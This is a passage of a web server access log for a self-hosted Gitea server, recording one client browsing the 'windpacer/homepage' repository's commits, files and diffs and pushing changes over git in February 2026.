(KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" +[17/Feb/2026:22:31:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/0b107bff0785eda86f81d01f50d0696ea2b0edc1" [Client 222.117.41.51] [Length 20159] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:22:32:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" +[17/Feb/2026:22:32:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/0b107bff0785eda86f81d01f50d0696ea2b0edc1" [Client 222.117.41.51] [Length 24059] [Gzip 5.34] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:22:32:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" +[17/Feb/2026:22:32:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/0b107bff0785eda86f81d01f50d0696ea2b0edc1?style=unified&whitespace=show-all&show-outdated=" [Client 222.117.41.51] [Length 23696] [Gzip 4.71] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:22:32:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" +[17/Feb/2026:22:32:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/0b107bff0785eda86f81d01f50d0696ea2b0edc1?style=split&whitespace=show-all&show-outdated=" [Client 222.117.41.51] [Length 24058] [Gzip 5.34] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:22:32:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blob_excerpt/0b107bff0785eda86f81d01f50d0696ea2b0edc1?&last_left=3&last_right=63&left=76&right=136&left_hunk_size=0&right_hunk_size=0&path=html%2Fassets%2Fjs%2Fscript.js&style=split&direction=down&&anchor=diff-21dabcef20d744cfa369e51302df86c5bda213cbK136" [Client 222.117.41.51] [Length 2021] [Gzip 11.61] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:22:32:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blob_excerpt/0b107bff0785eda86f81d01f50d0696ea2b0edc1?anchor=diff-21dabcef20d744cfa369e51302df86c5bda213cbK136&last_left=23&last_right=83&left=76&right=136&left_hunk_size=0&right_hunk_size=0&path=html%2Fassets%2Fjs%2Fscript.js&style=split&direction=down" [Client 222.117.41.51] [Length 2172] [Gzip 11.01] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:22:32:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blob_excerpt/0b107bff0785eda86f81d01f50d0696ea2b0edc1?anchor=diff-21dabcef20d744cfa369e51302df86c5bda213cbK136&last_left=43&last_right=103&left=76&right=136&left_hunk_size=0&right_hunk_size=0&path=html%2Fassets%2Fjs%2Fscript.js&style=split&direction=down" [Client 222.117.41.51] [Length 2266] [Gzip 11.54] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:22:32:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blob_excerpt/0b107bff0785eda86f81d01f50d0696ea2b0edc1?anchor=diff-21dabcef20d744cfa369e51302df86c5bda213cbK136&last_left=63&last_right=123&left=76&right=136&left_hunk_size=0&right_hunk_size=0&path=html%2Fassets%2Fjs%2Fscript.js&style=split&direction=down" [Client 222.117.41.51] [Length 1105] [Gzip 12.48] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:22:33:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 27] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" +[18/Feb/2026:00:24:47 +0000] - - 301 - GET http git.hanmocnn.co.kr "/windpacer/homepage.git/info/refs?service=git-receive-pack" [Client 222.117.41.51] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" +[18/Feb/2026:00:24:47 +0000] - 401 401 - GET https git.hanmocnn.co.kr "/windpacer/homepage.git/info/refs?service=git-receive-pack" [Client 222.117.41.51] [Length 13] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" +[18/Feb/2026:00:24:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage.git/info/refs?service=git-receive-pack" [Client 222.117.41.51] [Length 235] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" +[18/Feb/2026:00:24:56 +0000] - 200 200 - POST https git.hanmocnn.co.kr "/windpacer/homepage.git/git-receive-pack" [Client 222.117.41.51] [Length 113] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" +[18/Feb/2026:00:25:12 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:00:25:12 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/user/login" [Client 222.117.41.51] [Length 28] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:00:25:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 11647] [Gzip 4.91] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:00:25:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?count_only=1&uid=1&team_id=undefined&q=&page=1&mode=" [Client 222.117.41.51] [Length 12] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:00:25:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?sort=updated&order=desc&uid=1&team_id=undefined&q=&page=1&limit=15&mode=&archived=false" [Client 222.117.41.51] [Length 5594] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:00:25:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" +[18/Feb/2026:00:25:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage" [Client 222.117.41.51] [Length 20371] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:00:25:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" +[18/Feb/2026:00:25:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html" [Client 222.117.41.51] [Length 17358] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:00:25:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/tree-view/branch/main/?sub_path=html" [Client 222.117.41.51] [Length 21742] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:00:25:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" +[18/Feb/2026:00:25:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets" [Client 222.117.41.51] [Length 13949] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:00:25:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/tree-view/branch/main/?sub_path=html%2Fassets" [Client 222.117.41.51] [Length 26048] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:00:25:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" +[18/Feb/2026:00:25:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/js" [Client 222.117.41.51] [Length 13153] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:00:25:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/tree-view/branch/main/?sub_path=html%2Fassets%2Fjs" [Client 222.117.41.51] [Length 27041] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:00:25:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" +[18/Feb/2026:00:25:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/js/i18n.js" [Client 222.117.41.51] [Length 29329] [Gzip 5.95] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:00:25:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/tree-view/branch/main/?sub_path=html%2Fassets%2Fjs%2Fi18n.js" [Client 222.117.41.51] [Length 27041] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:01:03:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 989] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" +[18/Feb/2026:01:05:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 5780] [Gzip 2.38] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[18/Feb/2026:01:05:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/img/logo.svg" [Client 222.117.41.51] [Length 1040] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[18/Feb/2026:01:05:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/css/theme-gitea-auto.css?v=1.25.3" [Client 222.117.41.51] [Length 4323] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[18/Feb/2026:01:05:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/css/index.css?v=1.25.3" [Client 222.117.41.51] [Length 55932] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[18/Feb/2026:01:05:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/js/index.js?v=1.25.3" [Client 222.117.41.51] [Length 88858] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[18/Feb/2026:01:05:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/css/index-domready.3e022997.css" [Client 222.117.41.51] [Length 5100] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[18/Feb/2026:01:05:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/js/index-domready.d839c4b7.js" [Client 222.117.41.51] [Length 220214] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[18/Feb/2026:01:05:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/img/favicon.png" [Client 222.117.41.51] [Length 4136] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[18/Feb/2026:01:05:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/img/favicon.svg" [Client 222.117.41.51] [Length 1040] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[18/Feb/2026:01:05:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2f" [Client 222.117.41.51] [Length 4965] [Gzip 2.37] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[18/Feb/2026:01:05:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:01:05:18 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/user/login" [Client 222.117.41.51] [Length 28] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:01:05:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 11646] [Gzip 4.91] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:01:05:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?count_only=1&uid=1&team_id=undefined&q=&page=1&mode=" [Client 222.117.41.51] [Length 12] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:01:05:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?sort=updated&order=desc&uid=1&team_id=undefined&q=&page=1&limit=15&mode=&archived=false" [Client 222.117.41.51] [Length 5594] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:01:05:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/img/favicon.svg" [Client 222.117.41.51] [Length 1040] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:01:05:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" +[18/Feb/2026:01:05:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 11646] [Gzip 4.91] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:01:05:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?count_only=1&uid=1&team_id=undefined&q=&page=1&mode=" [Client 222.117.41.51] [Length 12] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:01:05:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?sort=updated&order=desc&uid=1&team_id=undefined&q=&page=1&limit=15&mode=&archived=false" [Client 222.117.41.51] [Length 5594] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:01:05:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" +[18/Feb/2026:01:05:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage" [Client 222.117.41.51] [Length 20344] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:01:05:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" +[18/Feb/2026:01:05:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html" [Client 222.117.41.51] [Length 17365] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:01:05:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/tree-view/branch/main/?sub_path=html" [Client 222.117.41.51] [Length 21742] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:01:05:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/index.html?only_content=true" [Client 222.117.41.51] [Length 31032] [Gzip 11.28] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:01:05:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/tree-view/branch/main/html/assets?sub_path=" [Client 222.117.41.51] [Length 4334] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:01:05:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets?only_content=true" [Client 222.117.41.51] [Length 3999] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:01:05:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/tree-view/branch/main/html/assets/js?sub_path=" [Client 222.117.41.51] [Length 1021] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:01:05:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/js?only_content=true" [Client 222.117.41.51] [Length 3241] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:01:05:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/js/script.js?only_content=true" [Client 222.117.41.51] [Length 9406] [Gzip 7.10] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:01:21:26 +0000] - - 301 - GET http git.hanmocnn.co.kr "/windpacer/homepage.git/info/refs?service=git-receive-pack" [Client 222.117.41.51] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" +[18/Feb/2026:01:21:26 +0000] - 401 401 - GET https git.hanmocnn.co.kr "/windpacer/homepage.git/info/refs?service=git-receive-pack" [Client 222.117.41.51] [Length 13] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" +[18/Feb/2026:01:21:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage.git/info/refs?service=git-receive-pack" [Client 222.117.41.51] [Length 235] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" +[18/Feb/2026:01:21:35 +0000] - 200 200 - POST https git.hanmocnn.co.kr "/windpacer/homepage.git/git-receive-pack" [Client 222.117.41.51] [Length 113] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" +[18/Feb/2026:01:21:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 417] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" +[18/Feb/2026:01:21:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage" [Client 222.117.41.51] [Length 20350] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:01:21:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" +[18/Feb/2026:01:21:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer" [Client 222.117.41.51] [Length 12440] [Gzip 3.64] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:01:21:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/avatars/a16511949167cdebe904492446eff88b?size=512" [Client 222.117.41.51] [Length 2182] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:01:21:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" +[18/Feb/2026:01:21:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage" [Client 222.117.41.51] [Length 20354] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 